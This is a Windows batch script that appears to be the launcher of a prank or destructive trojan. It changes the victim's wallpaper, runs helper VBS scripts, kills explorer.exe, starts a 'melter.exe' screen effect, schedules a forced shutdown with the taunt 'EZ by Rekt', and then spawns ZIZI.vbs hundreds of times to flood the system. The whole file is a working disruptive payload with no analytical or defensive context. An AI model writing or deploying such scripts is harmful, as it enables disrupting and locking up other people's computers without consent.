@echo off
reg add "HKCU\Control Panel\Desktop" /v Wallpaper /d "%temp%\version.bmp" /F
RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True
start parle.vbs
timeout /T 20 /NOBREAK>nul
taskkill /f /im explorer.exe
start melter.exe
start musicstart.vbs
start ZIZI.vbs
shutdown -s -t 300 -c "MMMMMM... EZ by Rekt"
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs
start ZIZI.vbs